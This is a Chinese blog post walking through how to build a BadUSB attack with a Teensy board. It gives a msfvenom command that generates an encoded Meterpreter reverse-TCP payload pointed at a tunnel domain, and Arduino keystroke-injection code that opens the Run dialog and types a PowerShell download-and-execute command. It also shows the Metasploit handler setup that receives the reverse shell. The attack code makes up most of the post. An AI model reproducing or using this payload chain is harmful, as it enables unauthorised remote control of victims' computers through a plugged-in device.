title
date
tags
layut
渗透利器-Teensy(低配版BadUSB)
2018-09-25
kali
post
⚡ /home/da1sy/arduino-1.8.7# ./arduino
⚡ /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64
注意将插件安装到arduino的解压目录下
打开软件后将 工具 下配置修改如下
⚡/home/da1sy/桌面/linux_amd64# ./sunny clientid 隧道ID号
⚡/home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe
lhost 为运行sunny后的域名,lport为开通隧道时填写的端口(运行后也会有显示)
char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); ";
char *command2 = "%HOMEPATH%\\windows.exe ";
//将连接的地址改为自己github的地址
void setup() {
delay(5000);
omg(command1);
delay(15000);
omg(command2);
}
void loop() {}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.println(SomeCommand);
}
⚡ /home/da1sy/# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 127.0.0.1
msf exploit(multi/handler) > set lport 6666 //ngrok开通隧道时填写的本地地址与端口号
msf exploit(multi/handler) > exploit
效果图如下
监听端
最后反弹的会话好像是出现了毛病,不过总体上嘛 问题不大
有时间再补
手机扫一扫
移动阅读更方便
你可能感兴趣的文章